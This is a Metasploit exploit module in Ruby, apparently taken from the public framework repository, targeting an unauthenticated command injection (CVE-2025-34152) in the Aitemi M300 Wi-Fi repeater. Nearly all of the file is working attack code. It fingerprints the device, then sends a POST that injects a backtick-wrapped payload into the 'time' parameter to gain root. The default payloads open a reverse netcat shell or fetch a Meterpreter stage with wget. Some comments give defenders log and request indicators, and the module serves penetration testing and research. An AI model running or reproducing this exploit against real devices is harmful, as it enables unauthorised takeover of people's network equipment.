GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/aitemi_m300_time_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'digest'
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  # AutoCheck runs #check before #exploit, so the fingerprinting below gates the
  # injection request unless the operator overrides that behaviour.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata.
  #
  # Points worth reading together:
  #   - 'BadChars' => "\x60": the payload is wrapped in backticks in #exploit,
  #     so a literal backtick inside the encoded payload would terminate the
  #     command substitution early.
  #   - 'Notes' declares CRASH_SERVICE_DOWN and IOC_IN_LOGS: the second target
  #     is labelled as possibly crashing the HTTP worker, and every request this
  #     module sends (the GET probes in #check, the POST in #exploit) is an
  #     HTTP-log artifact on the device.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)',
        'Description' => %q{
          This module exploits an unauthenticated remote command injection vulnerability
          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability
          lies in the 'time' parameter of the time configuration endpoint, which is passed
          unsanitized to a shell command executed via the `date -s` mechanism. The injection
          executes with root privileges, without requiring authentication, reboot, or
          network reconfiguration.
        },
        'Author' => [
          'Valentin Lobstein' # Vulnerability discovery and Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],
          ['CVE', '2025-34152']
        ],
        'Platform' => %w[linux unix],
        'Payload' => {
          # 0x60 is the backtick character; see #exploit, which wraps the payload in backticks.
          'BadChars' => "\x60"
        },
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            # Fetch-style target: the device is told to wget the Meterpreter stage into
            # /tmp (FETCH_WRITABLE_DIR) and FETCH_DELETE removes the file afterwards.
            # The target name records that this path may take the HTTP worker down.
            'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_CMD, ARCH_MIPSBE],
              'DefaultOptions' => {
                'FETCH_DELETE' => true,
                'FETCH_COMMAND' => 'WGET',
                'FETCH_WRITABLE_DIR' => '/tmp',
                'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => true,
        'DisclosureDate' => '2025-08-07',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  # Passive fingerprinting of the target's web UI. No injection is attempted here;
  # the module only compares static artifacts against known values.
  #
  # Three signals are collected, in order:
  #   1. SHA-256 of GET /favicon.ico against a hard-coded digest        -> 'favicon'
  #   2. The Server header of that response starting with 'lighttpd/1.4.32' -> 'httpd'
  #   3. index.html / home.html containing both 'langen.js' and 'dw(TT_SetWifiExt)'
  #
  # Return mapping:
  #   - Unknown  : no HTTP response at all, or none of the signals matched
  #   - Safe     : favicon.ico is not served with 200 (note: this short-circuits
  #                before the Server header and HTML probes are consulted)
  #   - Appears  : HTML markers found (strongest signal, returned immediately)
  #   - Detected : only the favicon and/or Server header matched
  #
  # For defenders: the GET requests for favicon.ico, index.html and home.html are
  # the log footprint of this check (cf. IOC_IN_LOGS in the module notes).
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    fingerprint_hits = []

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'favicon.ico')
    )

    return CheckCode::Unknown('No response from target') unless res
    # Any non-200 for the favicon ends the check as Safe; the later probes never run.
    return CheckCode::Safe('favicon.ico not found') unless res.code == 200

    # Static-asset fingerprint: exact SHA-256 of the favicon body.
    hash = Digest::SHA256.hexdigest(res.body)
    if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'
      print_good('Favicon hash matched – likely Aitemi M300 device')
      fingerprint_hits << 'favicon'
    end

    # Server header is optional (&.); only the version prefix is compared.
    server_header = res.headers['Server']
    if server_header&.start_with?('lighttpd/1.4.32')
      print_good("HTTP server version matched: #{server_header}")
      fingerprint_hits << 'httpd'
    end

    # UI-string fingerprint; the first page that matches returns Appears outright.
    %w[index.html home.html].each do |page|
      res_html = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, page)
      )

      next unless res_html&.code == 200

      if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')
        print_good("HTML fingerprint matched in #{page} – UI strings detected")
        return CheckCode::Appears('HTML language markers confirmed')
      end
    end

    # Only the weaker signals matched: report which ones, but not as Appears.
    if fingerprint_hits.any?
      return CheckCode::Detected("Partial match: #{fingerprint_hits.join(', ')}")
    end

    CheckCode::Unknown('No identifiable fingerprint found')
  end

  # Sends the single POST that carries the injected command in the 'time'
  # parameter of the time-configuration handler (fname=system, opt=time_conf,
  # function=set). The HTTP response is not inspected: the return value of
  # send_request_cgi is discarded, so success or failure is judged by whether
  # the payload handler receives a session, not by this request.
  #
  # Encoding notes:
  #   - The payload is wrapped in backticks (command substitution), which is why
  #     "\x60" is declared as a bad char in #initialize.
  #   - CGI.escape encodes spaces as '+'; the gsub rewrites them to '%20' so that
  #     the form body is strictly percent-encoded.
  #   - The 'protocol.csp?' path, with its trailing '?', is sent as given here;
  #     presumably deliberate for this firmware — verify against the device
  #     before changing it.
  #
  # For defenders: a POST to protocol.csp whose body contains
  # fname=system&opt=time_conf&function=set with a percent-encoded backtick
  # (%60) in the 'time' value is the request-level indicator for this module.
  #
  # @return [void]
  def exploit
    raw_payload = "`#{payload.encoded}`"
    encoded_payload = CGI.escape(raw_payload).gsub('+', '%20')

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'data' => "fname=system&opt=time_conf&function=set&time=#{encoded_payload}"
    )
  end
end